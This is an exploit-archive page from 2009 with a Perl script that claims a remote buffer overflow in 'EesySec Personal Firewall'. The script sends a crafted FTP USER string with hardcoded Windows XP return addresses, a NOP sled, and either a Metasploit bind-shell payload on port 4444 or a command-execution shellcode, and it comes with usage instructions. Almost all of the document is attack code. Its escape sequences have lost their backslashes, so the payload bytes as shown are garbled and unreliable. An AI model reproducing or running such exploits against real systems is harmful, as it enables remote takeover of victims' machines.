Home / os / win10

easysecpf-overflow.txt

Posted on 25 August 2009

#!/usr/bin/perl
#[+] Bug : EesySec Personal Firewall Remote Buffer Overflow Exploit
#[+] program  Download : www.effectmatrix.com
#[+] Author : the_Edit0r
#[+] Contact me : the_3dit0r[at]Yahoo[dot]coM
#[+] Greetz to all my friends
#[+] Tested on: Windows XP Pro SP3
#[+] web site: Expl0iters.ir  * Anti-security.ir
#[+] Big thnx: H4ckcity Member
use IO::Socket;
if(@ARGV < 2){
print q(
[ Expl0iters.ir   anti-security.ir                         ]
[ EesySec Personal Firewall Remote Buffer Overflow Exploit ]
[ Code By Edit0r <the_Edit0r@yahoo.com>                    ]
[ Usage : Expl0it.pl <Host> <win> <shellcode>              ]
[  win :Target <1> : Windows Xp SP3                        ]
[  Target <2> : Windows XP SP2 English                     ]
[  Shellcode : <1> Bind Port 4444 || <2> Execute CMD       ]
[  Ex : Expl0it.pl 127.0.0.1 1 2                           ]
);exit;}
($host,$win,$shell)=("$ARGV[0]","$ARGV[1]","$ARGV[2]");
$jk = "A"x 68;
if ( $win == 1 ){
$ret ="x7bx46x86x7c"; # kernel32.dll
}elsif( $win == 2 ){
$ret = "xedx83xe3x77"; #kernel32.dll
}
$nop ="x90"x 50;
if ( $shell == 1 ){
# win32_bind -  EXITFUNC=seh LPORT=4444 Size=344 Encoder=PexFnstenvSub
http://metasploit.com
$shellcode
="xd9xeexd9x74x24xf4x5bx31xc9xb1x5ex81x73x17x4fx85".
"x2fx98x83xebxfcxe2xf4xb3x6dx79x98x4fx85x7cxcdx19".
"xd2xa4xf4x6bx9dxa4xddx73x0ex7bx9dx37x84xc5x13x05".
"x9dxa4xc2x6fx84xc4x7bx7dxccxa4xacxc4x84xc1xa9xb0".
"x79x1ex58xe3xbdxcfxecx48x44xe0x95x4ex42xc4x6ax74".
"xf9x0bx8cx3ax64xa4xc2x6bx84xc4xfexc4x89x64x13x15".
"x99x2ex73xc4x81xa4x99xa7x6ex2dxa9x8fxdax71xc5x14".
"x47x27x98x11xefx1fxc1x2bx0ex36x13x14x89xa4xc3x53".
"x0ex34x13x14x8dx7cxf0xc1xcbx21x74xb0x53xa6x5fxce".
"x69x2fx99x4fx85x78xcex1cx0cxcax70x68x85x2fx98xdf".
"x84x2fx98xf9x9cx37x7fxebx9cx5fx71xaaxccxa9xd1xeb".
"x9fx5fx5fxebx28x01x71x96x8cxdax35x84x68xd3xa3x18".
"xd6x1dxc7x7cxb7x2fxc3xc2xcex0fxc9xb0x52xa6x47xc6".
"x46xa2xedx5bxefx28xc1x1exd6xd0xacxc0x7ax7ax9cx16".
"x0cx2bx16xadx77x04xbfx1bx7ax18x67x1axb5x1ex58x1f".
"xd5x7fxc8x0fxd5x6fxc8xb0xd0x03x11x88xb4xf4xcbx1c".
"xedx2dx98x5exd9xa6x78x25x95x7fxcfxb0xd0x0bxcbx18".
"x7ax7axb0x1cxd1x78x67x1axa5xa6x5fx27xc6x62xdcx4f".
"x0cxccx1fxb5xb4xefx15x33xa1x83xf2x5axdcxdcx33xc8".
"x7fxacx74x1bx43x6bxbcx5fxc1x49x5fx0bxa1x13x99x4e".
"x0cx53xbcx07x0cx53xbcx03x0cx53xbcx1fx08x6bxbcx5f".
"xd1x7fxc9x1exd4x6exc9x06xd4x7excbx1ex7ax5ax98x27".
"xf7xd1x2bx59x7ax7ax9cxb0x55xa6x7exb0xf0x2fxf0xe2".
"x5cx2ax56xb0xd0x2bx11x8cxefxd0x67x79x7axfcx67x3a".
"x85x47x68xc5x81x70x67x1ax81x1ex43x1cx7axffx98";
}elsif( $shell == 2 ){
# Execute CMD
$shellcode
="x55x8BxECx33xFFx57xC6x45xFCx63xC6x45xFDx6DxC6x45xFEx64x57xC6x45xF8x01x8Dx45xFCx50xB8x6Dx13x86x7CxFFxD0xCC";
}
$expl = $jk.$ret.$nop.$shellcode;
$exploit = IO::Socket::INET->new(Poroto =>"tcp",PeerAddr => "$host",PeerPort
=> "21");
print $exploit "USER $expl
";
print "[ * ]Payload Created...
";
print "[ * ]Injecting Payload...
";
print "[ * ] Shell...
";
close($exploit);

 

TOP

Malware :

Exploits :